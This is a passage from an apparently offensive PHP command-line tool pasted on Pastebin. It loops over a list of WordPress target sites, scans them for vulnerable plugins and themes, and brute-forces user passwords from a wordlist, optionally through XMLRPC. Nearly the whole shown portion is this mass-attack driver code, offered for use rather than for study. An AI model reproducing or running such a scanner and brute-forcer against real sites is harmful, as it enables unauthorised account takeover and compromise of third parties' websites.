  644.            ##  CAN'T LOAD LIST  ##
  645.            #######################
  646.            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
  647.             ##############
  648.            ##   EXIT   ##
  649.            ##############
  650.            bye();
  651.         }
  652.         #################
  653.        ##   POOYAA!   ##
  654.        #################
  655.        print "\n[+] Scanning begun";
  656.         $file = file_get_contents($list);
  657.         $plugins = explode("\n", $file);
  658.         print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
  659.         $targets = file_get_contents('wp.txt');
  660.         $r00t3rz = explode("\n", $targets);
  661.         print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
  662.         $key = strtolower(trim(fgets(STDIN)));
  663.         if(in_array($key, $yesno)){
  664.             $key = "set";
  665.         }else{
  666.             $key = NULL;
  667.         }
  668.         foreach($r00t3rz as $z){
  669.             if(!$z == ""){
  670.                 xp_scanner($z, $list, $key);
  671.             }
  672.         }
  673.         /*
  674.         #################
  675.         ##   Results   ##
  676.         #################
  677.         print "\n[+] Scanning finished!";
  678.         $vul = file_get_contents('vuln.txt');
  679.         $able = explode("\n", $vul);
  680.         print '[ '.count($able).' Website ]\n';
  681.         foreach($able as $gxp){
  682.             if(!$gxp==""){
  683.                 print "\n\t[!] $gxp";
  684.             }
  685.         }
  686.         */
  687.         bye();
  688.     } elseif($what == "2") {
  689.         print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
  690.         #################
  691.        ##   POOYAA!   ##
  692.        #################
  693.        print "\n[+] Scanning begun";
  694.         $targets = file_get_contents('wp.txt');
  695.         $r00t3rz = explode("\n", $targets);
  696.         foreach($r00t3rz as $z){
  697.             if(!$z == ""){
  698.                 xp_get_plugins($z);
  699.                 xp_get_themes($z);
  700.             }
  701.         }
  702.         #################
  703.        ##   Results   ##
  704.        #################
  705.        print "\n[+] Finished, these are the websites have a vulnerability plugin/s:\n";
  706.         $vulpl = file_get_contents('vulpl.txt');
  707.         $getpl = explode("\n", $vulpl);
  708.         #print "[ ".count($get)." Website ]\n"; // empty lines will be counted
  709.        foreach($getpl as $vul){
  710.             if(!$vul==""){
  711.                 print "\n\t$vul";
  712.             }
  713.         }
  714.         bye();
  715.     } elseif($what == "3") {
  716.         print "\nNP, WHERE IS YOUR PASSWORS LIST? [ex: hk.txt] : ";
  717.         $list = trim(fgets(STDIN));
  718.         if(!is_file($list)) {
  719.             #######################
  720.            ##  CAN'T LOAD LIST  ##
  721.            #######################
  722.            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
  723.             ##############
  724.            ##   EXIT   ##
  725.            ##############
  726.            bye();
  727.         }
  728.         #################
  729.        ##   POOYAA!   ##
  730.        #################
  731.        print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
  732.         $xmlrpc = strtolower(trim(fgets(STDIN)));
  733.         if(in_array($xmlrpc, $yesno)){
  734.             $xml = "set";
  735.         }else{
  736.             $xml = NULL;
  737.         }
  738.         print "\n[+] Bruting begun";
  739.         $targets = file_get_contents('wp.txt');
  740.         $xp = explode("\n", $targets);
  741.         foreach($xp as $z){
  742.             if(!$z == ""){
  743.                 xp_get_user($z, $list, $xml);
  744.             }
  745.         }
  746.         bye();
  747.     } else {
  748.         ######################
  749.        ##  OOH KILL'EM =P  ##
  750.        ######################
  751.        bye();
  752.     }
  753. }
  754. #####################################
  755. ##  © ALM3REFH.COM 2014 - CHEERS!  ##
  756. #####################################
  757. ?>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×